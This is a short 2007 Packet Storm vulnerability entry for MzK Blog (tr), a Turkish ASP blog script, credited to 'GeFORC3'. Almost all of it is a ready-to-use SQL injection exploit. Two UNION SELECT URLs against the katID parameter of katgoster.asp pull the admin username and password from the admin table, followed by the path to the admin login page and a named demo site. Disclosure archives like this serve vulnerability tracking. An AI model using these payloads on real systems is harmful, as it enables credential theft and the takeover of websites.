mzkblog-sql.txt

2007-07-13T00:00:00
ID PACKETSTORM:57752
Type packetstorm
Reporter GeFORC3
Modified 2007-07-13T00:00:00

Description

                                        
                                            `  
MzK Blog (tr)) SQL Injection Vuln  
  
#Software: MzK Blog (tr)  
#download: http://www.aspindir.com/goster/5013  
#demo: http://www.karahanbilgisayar.com/blog/  
#Found By: GeFORC3 | G3  
  
#Exploit:  
  
http://site.com/script_path/katgoster.asp?katID=-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin  
  
http://site.com/script_path/katgoster.asp?katID=-1+union+select+0,sifre,2,3,4,5,6,7+from+admin  
  
adminpanel:  
  
/login.asp  
  
  
WwW.GeFORC3.Org | WwW.HeykirBlog.Org | WwW.NetKaBus.Com  
`